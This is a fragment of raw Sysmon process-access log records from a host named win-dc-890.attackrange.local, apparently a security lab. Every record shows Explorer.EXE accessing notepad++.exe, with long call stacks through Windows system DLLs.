64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047037Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047036Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047035Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047034Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047033Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047032Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047031Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047030Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047029Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047028Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047027Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047026Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047025Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047024Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047023Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047022Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\W